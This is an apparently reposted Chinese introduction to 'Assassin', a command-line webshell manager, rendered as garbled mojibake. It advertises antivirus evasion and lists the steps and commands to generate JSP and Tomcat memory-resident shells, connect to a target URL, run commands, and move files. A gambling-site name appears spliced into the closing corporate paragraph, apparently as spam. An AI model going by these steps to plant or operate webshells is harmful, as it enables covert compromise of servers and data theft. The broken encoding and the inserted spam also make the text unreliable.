ÏîÄ¿×÷Õߣºb1ackc4t

ÏîÄ¿µØÖ·£ºhttps://github.com/b1ackc4t/Assassin

Ò»¡¢¹¤¾ßÏÈÈÝ

AssassinÊÇÒ»¿î¾«¼òµÄ»ùÓÚÏÂÁîÐеÄwebshell¹ÜÀí¹¤¾ß£¬£¬£¬£¬£¬ËüÓÐ×ŶàÖÖpayload·¢ËÍ·½·¨ºÍ±àÂë·½·¨£¬£¬£¬£¬£¬ÒÔ¼°¾«¼òµÄpayload´úÂ룬£¬£¬£¬£¬Ê¹µÃËü³ÉΪÒþ²ØµÄıº¦Õߣ¬£¬£¬£¬£¬ÄÑÒÔ±»ºÜºÃµÄ·ÀÓù¡£¡£¡£¡£¡£¡£¹¤¾ß¶ÌС¾«º·£¬£¬£¬£¬£¬ÌìÉúµÄwebshellÄܹ»¹ý³£¼ûɱÈí£¬£¬£¬£¬£¬Ö»¹ÜïÔÌ­ÁËÅþÁ¬ºó½»»¥µÄÁ÷Á¿ÌØÕ÷£¬£¬£¬£¬£¬Ïêϸpayload·¢ËÍ·½·¨¾ù¿É×Ô½ç˵¡£¡£¡£¡£¡£¡£ÓÉÓÚСÎÒ˽¼Ò¾«ÉñÓÐÏÞ£¨ÓÉÓÚÀÁ²¢ÇҲˣ©£¬£¬£¬£¬£¬·þÎñ¶ËÔÝʱ½öÖ§³ÖJava¡£¡£¡£¡£¡£¡£

¶þ¡¢×°ÖÃÓëʹÓÃ

1¡¢ÓÃstartup.bat»òstartup.shÆô¶¯£¬£¬£¬£¬£¬Ö®ºó»áµ¯³ö´°¿ÚÑ¡ÔñÉúÑÄλÖÃ

new java 123 cookie# ÌìÉúÃÜÂëΪ123 ·¢ËÍ·½·¨ÎªcookieµÄͨË×jspľÂínew java pass post reqEncode=base36 tamper=tomcat9_filter# ÌìÉúÃÜÂëΪpass ·¢ËÍ·½·¨Îªpost ÇëÇóÓÃbase36±àÂëµÄtomcat9 filterÄÚ´æÂí

2¡¢½«webshellÉϵ½Ä¿µÄ·þÎñÆ÷

add http://192.168.48.130:8080/1.jsp 123 java method=cookie resEncode=base36# Ìí¼Ówebshell ÃÜÂë123 javaÂí cookie´«²Î ÇëÇó±àÂëĬÈÏbase64 ÏìÓ¦±àÂëbase36

3¡¢showÉó²éIDºÅ

4¡¢session 1ÅþÁ¬webshell

5¡¢¿´µ½ÌáÐÑ·û±¬·¢×ª±ä¾Í¿ÉÒÔÖ´ÐÐwebshell controller commandsµÄÏÂÁîÁË

Assassin|java >getshell

Assassin|java|C:\apache-tomcat-9.0.54\bin >dir

6¡¢ÉÏ´«Îļþ

upload # û²ÎÊýĬÈÏ´«µ½Ä¿½ñĿ¼£¬£¬£¬£¬£¬Ñ¡ÔñÎļþ¼´¿ÉÉÏ´«

7¡¢ÏÂÔØÎļþ

download ./test.txtͬÀí

Èý¡¢ÏÂÔصØÖ·£º

ͨ¹ýÏîÄ¿µØÖ·ÏÂÔØ£º

https://github.com/b1ackc4t/Assassin

ËÄ¡¢ÉùÃ÷£º

½ö¹©Çå¾²Ñо¿Óëѧϰ֮Ó㬣¬£¬£¬£¬Èô½«¹¤¾ß×öÆäËûÓÃ;£¬£¬£¬£¬£¬ÓÉʹÓÃÕ߼縺ËùÓÐÖ´·¨¼°Á¬´øÔðÈΣ¬£¬£¬£¬£¬×÷Õß²»¼ç¸ºÈκÎÖ´·¨¼°Á¬´øÔðÈΡ£¡£¡£¡£¡£¡£

TOPSEC

Ê®ÄêÊ÷ľ£¬£¬£¬£¬£¬°ÙÄêÊ÷ÈË¡£¡£¡£¡£¡£¡£Î´À´£¬£¬£¬£¬£¬3377ÌåÓýÍø¹ÙÍøÈë¿Ú½«Ê¼ÖÕÆð¾¢Ì½Ë÷£¬£¬£¬£¬£¬Ò»Ö±ÑÓÕ¹ÍøÂçÇå¾²È˲Å×÷ÓýµÄ¿í¶ÈºÍÉî¶È£¬£¬£¬£¬£¬ÎªÍøÂçÇå¾²È˲Å×÷ÓýÓ빤ҵÉú³¤Ð¢Ë³ÆóÒµÁ¦Á¿¡£¡£¡£¡£¡£¡£